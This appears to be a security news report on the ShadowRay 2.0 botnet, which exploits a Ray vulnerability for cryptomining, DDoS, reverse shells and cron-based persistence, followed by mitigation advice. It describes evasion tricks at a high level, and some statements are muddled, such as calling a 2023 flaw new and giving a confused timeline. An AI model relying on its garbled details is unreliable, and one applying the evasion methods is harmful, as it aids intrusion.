Cybersecurity specialists have warned about the rise of ShadowRay 2.0. Unlike the earlier waves, this complex botnet expands on previous attacks that started between last September and March 2024. This new edition capitalizes on a new major missing authentication vulnerability, CVE-2023-48022. The exploit, which has a CVSS score of 9.8, allows it to take over vulnerable Ray instances. This method has been exploited by the botnet to usurp computing power for unauthorized cryptocurrency mining, particularly Monero through the utilization of XMRig.
ShadowRay 2.0 then verifies that the victim is within the PRC’s borders. If they are, it serves up a localized version of that malware specifically for that region. Ray’s development best practices entail that the system operates solely on closed networks with audited code. This approach has resulted in the lack of a patch for this vulnerability.
The Infection Chain and Its Implications
The infection chain created by ShadowRay 2.0 allows infected Ray clusters to carry out “spray and pray” attacks. Once inside, these attacks allow the malware to spread its payloads over different Ray dashboards, producing a self-replicating worm effect. These pirated clusters are more than just cryptojacking. Attackers can weaponize them to launch denial-of-service (DDoS) attacks against rival mining pools or other infrastructure.
Since there are currently over 230,500 Ray servers publicly available, the scope for negative impact is vast. ShadowRay 2.0 uses multiple methods to bypass detection, such as hiding harmful processes under the name Linux kernel worker services to cover its tracks. By keeping CPU usage between 50% and 70%, the botnet sets out to avoid detection while carrying out its activity.
“This transforms the operation from pure cryptojacking into a multi-purpose botnet. The ability to launch DDoS attacks adds another monetization vector – attackers can rent out DDoS capacity or use it to eliminate competition.” – Oligo
Technical Capabilities and Persistence Mechanisms
ShadowRay 2.0 takes advantage of the orchestration capabilities on the underlying Ray platform to quickly pivot laterally to non-internet-facing nodes. During the period of infection, the malware can spread silently throughout networks. It drops reverse shells that connect back to the attacker’s infrastructure, enabling remote management of the shell.
ShadowRay 2.0 ensures its own continued operation by installing a cron job. Once every 15 minutes, it automatically pulls the latest version of that malware from GitLab. The attacks leverage GitLab and GitHub as a means to stage and deliver malicious payloads. This backward-looking approach greatly compounds any detection and mitigation efforts already inherently difficult.
“Attackers deployed sockstress, a TCP state exhaustion tool, targeting production websites.” – Oligo
Mitigation Efforts and Recommendations
Anyscale released a new tool to help with them – the Ray Open Ports Checker. This tool is useful to validate cluster configurations and ensure that accidental exposure doesn’t happen. This tool is intended to assist organizations in protecting their Ray instances from being exploited by malicious adversaries.
The ShadowRay 2.0 botnet is ever-changing. Cybersecurity experts have long encouraged everyone to just patch those vulnerabilities in a timely manner and adopt basic network security hygiene. We encourage organizations to double check configurations and make sure their systems aren’t accidentally left vulnerable to these kinds of attacks.